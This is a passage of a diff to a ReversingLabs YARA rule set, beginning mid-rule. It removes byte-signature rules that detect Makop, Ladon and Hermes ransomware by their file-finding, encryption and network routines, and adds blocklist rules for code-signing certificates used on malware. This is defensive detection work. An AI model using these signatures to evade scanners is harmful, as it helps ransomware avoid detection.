-            ?? ?? ?? ?? ?? 50 8B 47 ?? FF D0 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ??
-            ?? 74 ?? 66 8B 8D ?? ?? ?? ?? 66 83 F9 ?? 74 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 33 D2
-            33 C0 66 3B D1 74 ?? 0F B7 C9 8B FF 40 66 89 4C 1A ?? 8D 14 00 C7 45 ?? ?? ?? ?? ??
-            0F B7 8C 15 ?? ?? ?? ?? 66 39 4D ?? 75 ?? 8B 55 ?? 33 C9 66 89 4C 43 ?? 68 ?? ?? ??
-            ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 01 45 ?? 8D 85 ?? ?? ?? ?? 50 8B 47 ?? 56 FF D0 85
-            C0 75 ?? 8B 47 ?? 56 FF D0 8D 85 ?? ?? ?? ?? 50 FF 75 ?? C7 43 ?? ?? ?? ?? ?? 8B 47
-        }
-		$search_and_encrypt_2 = {
-            33 F6 89 75 ?? FF D0 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ??
-            F6 85 ?? ?? ?? ?? ?? 75 ?? 66 8B BD ?? ?? ?? ?? 33 F6 8B 8E ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 83 FF ?? 75 ??
-            EB ?? 8D 9B ?? ?? ?? ?? 66 8B 48 ?? 83 C0 ?? 83 C2 ?? 66 3B 0A 74 ?? 66 83 38 ?? 0F
-            85 ?? ?? ?? ?? 66 83 3A ?? 0F 85 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? 8B 7D
-            ?? 8B 75 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 50 8B 47 ?? FF D0 85 C0 8B 45 ?? 0F 85 ??
-            ?? ?? ?? 50 8B 47 ?? FF D0 85 F6 74 ?? 8B 55 ?? 33 C0 8B CF 66 89 43 ?? E8 ?? ?? ??
-            ?? FF 75 ?? 8B 47 ?? 6A ?? FF 77 ?? FF D0 8B 45 ?? 8B 5D ?? 03 C6 03 D8 8B 45 ?? 40
-            89 5D ?? 89 45 ?? BA ?? ?? ?? ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8B 47 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B CF E8
-            ?? ?? ?? ?? 83 C4 ?? 03 C3 5F 5E 5B 8B E5 5D C3 33 C9 33 C0 66 3B CF 74 ?? 0F B7 CF
-            33 D2 8D 9B ?? ?? ?? ?? 40 66 89 4C 1A ?? 8D 14 00 33 F6 0F B7 8C 15 ?? ?? ?? ?? 66
-            3B F1 75 ?? 8B 75 ?? FF 75 ?? 8B 7D ?? 33 C9 46 57 66 89 4C 43 ?? 89 75 ?? E8 ?? ??
-            ?? ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $search_and_encrypt_* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "1c:c3:7d:e5:db:ed:09:7f:98:f5:6d:bc" and 1476693977 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Makop : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_50F66Ab0D7Ed19B69D48F635E69572Fa : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Makop ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9b7d42f3-0417-5228-8b25-244224cbc414"
-		date = "2020-10-30"
-		modified = "2020-10-30"
+		id = "9938b4c5-4a2b-5f4a-92a0-28c3519b1ed3"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Makop.yara#L1-L99"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0ff4739d32b4a775d07a5f22d551ed67025681d4986e4404c9a01ad4078468f3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15278-L15294"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "28f71c0572e769d4a0cb289071912bc79cddfd98a3a8161c5400c7bee7090bf5"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Makop"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 56 8B F8 6A ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 5F 5E 5B 8B E5 5D C3 33 F6 89 74 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? 8D 64 24 ??
-            66 8B 44 24 ?? 66 85 C0 0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 8B 44 24 ?? 66 85 C0
-            0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ??
-            EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 8D 54 24 ?? 2B C2 D1 F8 83
-            E8 ?? 85 F6 8B F8 89 7C 24 ?? 75 ?? 8B 45 ?? 05 ?? ?? ?? ?? 03 C0 0F 84 ?? ?? ?? ??
-            50 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 8B F0 0F 84 ?? ?? ??
-            ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 38 85 FF 74 ?? 8B 1F 8D 54 24
-            ?? 8B CA 2B D9 8D 49 ?? 0F B7 04 13 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 0F
-            B7 C8 0F B7 02 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 83 C2 ?? 66 85 C9 0F B7
-            C0 74 ?? 66 3B C8 74 ?? 0F B7 D0 0F B7 C1 2B C2 0F 84 ?? ?? ?? ?? 8B 7F ?? 85 FF 75
-            ?? 8B 7D ?? 8B 55 ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8B 4D ?? 8D 5C 4E ?? BA
-            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 1C 56 8D 54 24 ?? BF ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4D ?? 8D 54 08 ?? 8B 45 ?? 52 56 50 E8
-        }
-		$find_files_p2 = {
-            83 C4 ?? E9 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ??
-            80 79 ?? ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 03 FA 81 FF ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B
-            15 ?? ?? ?? ?? C6 44 24 ?? ?? 8B 7D ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8A 44
-            24 ?? 84 C0 75 ?? 8B 55 ?? 83 C7 ?? 8D 5E ?? E8 ?? ?? ?? ?? 8A 44 24 ?? 8A C8 8B 54
-            24 ?? F6 D9 1B C9 83 E1 ?? F6 D8 8B F1 8D BE ?? ?? ?? ?? 1B C0 83 E0 ?? 83 C0 ?? 03
-            45 ?? 8D 04 42 89 44 24 ?? 8D 58 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8D BE
-            ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 8B 74 24 ?? 8B 45 ?? 77 ??
-            3B 70 ?? 77 ?? B1 ?? EB ?? 8B 55 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 32 C9 88 48 ?? 8B
-            4C 24 ?? F6 C1 ?? 74 ?? C6 40 ?? ?? 89 48 ?? EB ?? C6 40 ?? ?? 50 89 50 ?? 89 70 ??
-            8B 44 24 ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
-            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? EB ?? 56 6A ?? FF 15
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files = {
-            8B 50 ?? 8B 00 83 EC ?? 55 8B 2D ?? ?? ?? ?? 56 57 6A ?? 8B F9 8D 4C 24 ?? 51 52 50
-            53 FF D5 85 C0 0F 84 ?? ?? ?? ?? 8B 57 ?? 8B 47 ?? 33 F6 56 8D 4C 24 ?? 51 52 50 53
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? B0 ?? 5F 5E 5D 83
-            C4 ?? C3 3B 47 ?? 73 ?? 8B C8 83 E1 ?? 74 ?? BE ?? ?? ?? ?? 2B F1 8B 4F ?? 56 03 C8
-            6A ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B 4F ?? 03 C6 50 8D 54 24 ?? 52 51 6A
-            ?? 6A ?? 89 44 24 ?? 8B 44 24 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8B 4C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 51 52 53 FF D5 85 C0 74 ?? 8B 4C 24 ?? 8B 57 ??
-            8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 03 CE 51 52 53 FF D7 85 C0 74 ?? 8B 44 24 ??
-            8D 0C 30 8B 44 24 ?? 3B C1 72 ?? 01 44 24 ?? 8B 44 24 ?? 8B 50 ?? 8B 00 83 54 24 ??
-            ?? 6A ?? 6A ?? 52 50 53 FF D5 85 C0 74 ?? 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52
-            53 FF D7 85 C0 74 ?? 83 7C 24 ?? ?? 0F 83 ?? ?? ?? ?? 5F 5E 32 C0 5D 83 C4 ?? C3
-        }
-		$enum_network_resources = {
-            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B F0 85 F6 89 74 24 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? 8D 44 24 ?? 50 51 6A ??
-            6A ?? 57 E8 ?? ?? ?? ?? 85 C0 74 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B
-            7D ?? 68 ?? ?? ?? ?? 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 52 56 8D 44 24 ?? 50 51 E8 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 85 C0 75 ?? 8B 54 24 ?? 8B 45 ?? 52 50 EB ?? 8B 4C 24
-            ?? 8B 50 ?? 51 52 E8 ?? ?? ?? ?? 33 DB 83 C4 ?? 39 5C 24 ?? 76 ?? 83 C6 ?? 8D 49 ??
-            8B 46 ?? 85 C0 8B C8 75 ?? B9 ?? ?? ?? ?? 8B 46 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 51 8B
-            0E 51 50 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? A8 ?? 74 ?? 8B 56 ?? 85 D2 74 ?? 85 FF 7E
-            ?? 8B 45 ?? 85 C0 74 ?? 8B 40 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 83
-            EF ?? 57 8D 46 ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? F6 06 ?? 74 ?? 50 E8 ?? ?? ??
-            ?? 8B 56 ?? 8B 45 ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C3 ?? 83 C6 ?? 3B 5C 24 ?? 0F
-            82 ?? ?? ?? ?? 8B 74 24 ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_network_resources ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wei Liu" and pe.signatures [ i ] . serial == "50:f6:6a:b0:d7:ed:19:b6:9d:48:f6:35:e6:95:72:fa" and 1467158400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ladon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_11212F502836A784752160351Defb136Cf09 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ladon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ebc8f957-cdcf-54eb-bd02-74088cf51768"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "7609083d-145b-5594-a04b-72c2862873eb"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Ladon.yara#L1-L101"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "979e3f3bf6a67bf10b6bfdd2eeb722d8836096076b7e88c6d4aca041a1a9eecb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15296-L15312"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "63d4c1aaafdf6de14d0ae78035644cf6b0fefab8b0063d2566ca38af9f9498d2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ladon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66
-            3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2
-            75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
-            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85
-            ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 85 DB 74 ?? 90 8B 45 ?? 8B
-            34 B8 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 8B 08 66 3B 0E 75 ?? 66 85 C9 74 ??
-            66 8B 48 ?? 66 3B 4E ?? 75 ?? 83 C0 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83
-            C8 ?? 85 C0 74 ?? 47 3B FB 72 ?? 8B 75 ?? 8B 7D ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 33 DB 83 F8 ?? 0F
-            95 C3 FF 15 ?? ?? ?? ?? 5E 8B C3 5B 5F 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 33 DB 89 5D ?? E8 ?? ?? ?? ?? 8B F8 83
-            C4 ?? 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 83 3F ?? 0F 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ??
-            FF 77 ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
-            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
-            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
-            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
-            77 ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 83 3E ?? 0F 85
-            ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ??
-            8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 39 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 70
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF 75 ?? 33 FF C7 45
-            ?? ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 83 3E ?? 75 ?? 57
-            68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? FF 70 ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
-            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 7B ?? A1 ??
-            ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1D ?? ?? ?? ?? 85 F6 74 ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B C7 5F 5E 5B 8B E5 5D C3 FF 76 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 78 ?? 85 FF 74 ?? 8B 47 ?? 89 45
-        }
-		$encrypt_files_p2 = {
-            8B 70 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 04 75 ?? ?? ?? ?? 50 6A ?? FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 84 9D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 0C 75
-            ?? ?? ?? ?? 51 50 8D 46 ?? 50 8B 45 ?? FF 70 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 3F
-            43 85 FF 75 ?? 68 ?? ?? ?? ?? C7 84 9D ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50
-            6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B C8 89 4D ?? 85 C9 0F 84 ?? ?? ?? ??
-            8B C6 99 6A ?? 2B C2 D1 F8 6A ?? 89 45 ?? 8D 45 ?? 50 51 6A ?? 56 FF 77 ?? FF 15 ??
-            ?? ?? ?? 8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 57 8B 7D ?? 8B F0 57 56 FF 15 ?? ?? ?? ?? 56 FF 15
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
-            ?? ?? 8B 7D ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 05 ?? ?? ??
-            ?? ?? ?? ?? ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 85 DB 74 ?? FF B4 B5 ??
-            ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 46 3B F3 72 ?? 8B 45 ?? 5F 5E
-            5B 8B E5 5D C3
-        }
-		$remote_connection = {
-            8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E5 5D C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 78 ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ??
-            85 F6 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures [ i ] . serial == "11:21:2f:50:28:36:a7:84:75:21:60:35:1d:ef:b1:36:cf:09" and 1463726573 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Hermes : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2C16Be9A7Ce2A23Ab7A4B4Eb7Da3400C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Hermes ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1f1f363a-5be0-59e5-b1c1-5e277922790c"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "4e17aed7-fd76-549f-bcf7-84c97efc44e4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Hermes.yara#L1-L284"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6db95c422ee2f9dd8a1795031ee8d7d5ed84e16cde47512becc006b6a849e890"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15314-L15330"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "917f324cbe91718efc9b2f41ef947fa8f1a501dde319936774d702d57b1e6b37"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Hermes"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$hermes_find_files_v1_p1 = {
-            A5 A5 A5 8D BD ?? ?? ?? ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 66 A5 68 ??
-            ?? ?? ?? 8D BD ?? ?? ?? ?? 50 AB 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 65
-            ?? ?? 8B 5D ?? 8B FB 4F 4F 8D 47 ?? 66 8B 4F ?? 47 47 66 85 C9 75 ?? BE ?? ?? ?? ??
-            A5 A5 8D 8D ?? ?? ?? ?? 51 50 66 A5 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? E8
-            ?? ?? ?? ?? 59 59 8B C8 E8 ?? ?? ?? ?? 8B CB 8B D0 E8 ?? ?? ?? ?? 2B C2 33 C9 83 7D
-            ?? ?? 66 89 0C 43 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
-            8B C1 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
-            8B C1 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75
